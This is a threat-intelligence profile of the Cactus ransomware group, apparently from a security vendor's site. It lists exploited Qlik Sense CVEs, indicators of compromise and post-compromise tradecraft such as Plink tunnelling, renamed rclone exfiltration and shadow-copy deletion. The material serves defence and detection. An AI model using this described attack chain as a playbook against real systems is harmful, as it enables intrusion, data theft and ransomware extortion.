CACTUS
Cactus is a ransomware family/group active worldwide since at least March 2023, with reporting linking multiple attacks to the group from late 2023 onward. It is described as an emerging ransomware operation and has been referenced as one of the ransomware families used by former Black Basta affiliates after Black Basta’s collapse; separate reporting also notes similar social-engineering intrusion patterns involving email bombing, Microsoft Teams impersonation, and Quick Assist in Black Basta and Cactus intrusions. Cactus has targeted organizations through exploitation of internet-exposed, unpatched Qlik Sense servers. Joint analysis by Fox-IT, Northwave, Responders, and ESET Nederland found Dutch victims were consistently compromised via outdated Qlik Sense servers, and Project Melissa estimated roughly 5,200 internet-reachable Qlik Sense servers worldwide, more than 3,100 vulnerable, with 122 likely already exploited by Cactus. Arctic Wolf separately reported a campaign exploiting Qlik Sense vulnerabilities CVE-2023-41266 and CVE-2023-41265, and possibly CVE-2023-48365, to gain initial access and ultimately deploy Cactus ransomware.
Observed post-compromise behavior in Qlik Sense-related intrusions included Scheduler.exe spawning cmd.exe and PowerShell, use of PowerShell and BITS to download tooling, deployment of renamed ManageEngine UEMS components, AnyDesk, and PuTTY/Plink, execution of discovery commands with output redirected into .ttf files, uninstalling Sophos via msiexec, changing the local Administrator password, establishing an RDP tunnel with Plink over port 443, lateral movement via RDP, downloading WizTree, and exfiltration with rclone renamed to svchost.exe before ransomware deployment. Reported infrastructure and artifacts from that activity included zohoservice[.]net, 216.107.136[.]46, 144.172.122[.]30, 45.61.147[.]176, C:\Users\Public\svchost.exe, and a Plink sample with SHA-256 828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d.
The malware is associated with inhibiting recovery by deleting Windows shadow copies before encryption, and Splunk analytics explicitly tie Cactus to WMIC and PowerShell shadow-copy deletion behaviors mapped to ATT&CK T1490. Additional detection content associates Cactus with suspicious HTTP PUA user agents, suspicious DNS queries to Discord or other abused web services, and anomalous DLLHost, SearchProtocolHost, and Rundll32 executions without normal command-line arguments, though those analytics are detection associations rather than unique Cactus-exclusive traits. High-confidence targeting beyond the Qlik Sense intrusion set includes Dutch organizations identified through Project Melissa; broader ransomware reporting also places Cactus among active groups affecting multiple sectors globally.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
7 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
For those looking for in-depth coverage of these exploits, the Arctic Wolf blog provides detailed insights into the specific vulnerabilities being exploited, notably CVE-2023-41266, CVE-2023-41265 also known as ZeroQlik, and potentially CVE-2023-48365 also known as DoubleQlik.
For those looking for in-depth coverage of these exploits, the Arctic Wolf blog provides detailed insights into the specific vulnerabilities being exploited, notably CVE-2023-41266, CVE-2023-41265 also known as ZeroQlik, and potentially CVE-2023-48365 also known as DoubleQlik.
Retrieving this file with the ?.ttf extension trick has been fixed in the patch that addresses CVE-2023-48365... Nevertheless, this is still a good way to determine the state of a Qlik instance, because if it redirects using 302 Authenticate at this location it is likely that the server is not vulnerable to CVE-2023-48365.
CVE-2023-27997: Fortinet FortiOS SSL VPN Heap Buffer Overflow RCE - XORtigate (CVSS 9.8)
CVE-2024-21762: Fortinet FortiOS SSL VPN Out-of-Bounds Write RCE (CVSS 9.8)
CVE-2024-40766: SonicWall SonicOS Improper Access Control (CVSS 9.8)
CVE-2025-23006: SonicWall SMA 1000 Pre-Auth Deserialization RCE (CVSS 9.8)
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Since November 2023, the Cactus ransomware group has been actively targeting vulnerable Qlik Sense servers.
Following BlackBasta’s shutdown, its former affiliates did not simply disappear. Instead, they regrouped and continued their criminal activities under different ransomware families, including Cactus, and more recently, Payouts King.
...the new Cactus ransomware variant... demonstrates an advanced use of command and scripting techniques...
Techniques & procedures
2 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 techniquelast quarter featured a dominant voice phishing (vishing) campaign deploying Cactus and Black Basta ransomware that was significantly less present this quarter
Impact
1 techniqueThis analytic detects the use of WMIC to delete volume shadow copies, which is a common technique used by ransomware actors to prevent system recovery.
Recent activity
31 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Named ransomware family used by former BlackBasta affiliates after BlackBasta disbanded.
A ransomware family mentioned as one of the operations used by former BlackBasta affiliates after BlackBasta’s shutdown.
Ransomware family referenced as having intrusions that used similar email-bombing + Teams impersonation + Quick Assist tradecraft.
Associated Analytic Story Cactus Ransomware DarkGate Malware DarkSide Ransomware Ransomware Revil Ransomware VanHelsing Ransomware
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.